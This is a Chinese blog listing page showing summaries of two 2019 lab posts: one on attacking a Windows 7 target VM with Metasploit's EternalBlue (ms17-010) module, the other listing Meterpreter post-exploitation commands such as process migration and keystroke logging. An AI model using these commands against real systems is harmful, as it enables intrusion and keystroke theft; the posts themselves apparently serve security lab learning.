• 博客园logo
  • 会员
  • 周边
  • 新闻
  • 博问
  • 闪存
  • 众包
  • 赞助商
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
守护女神
博客园    首页    新随笔    联系   管理    订阅  订阅
2019年1月20日
metasploit 下利用永恒之蓝攻击靶机win7
摘要: 实验环境:一台win7靶机,kali作为攻击机 控制台下输入msfconsole search ms17-010 use exploit/windows/smb/ms17_010_eternalblue 接下来可以看一下受这个漏洞影响的操作系统 可以看出受影响的有两个,分别是win7和server 阅读全文
posted @ 2019-01-20 11:39 守护女神 阅读(5551) 评论(1) 推荐(0)
meterpreter基本命令
摘要: screenshot :截屏,获取用户的桌面截屏 sysinfo:获取系统运行的平台 ps:获得目标系统正在运行的进程 migrate 进程号:将会话迁移到进程里面 run post/windows/capture/keylog_recorder:在进程空间下启用这个模块,获取键盘记录 除了使用键盘 阅读全文
posted @ 2019-01-20 09:54 守护女神 阅读(1134) 评论(0) 推荐(0)
博客园  ©  2004-2026
浙公网安备 33010602011771号 浙ICP备2021040463号-3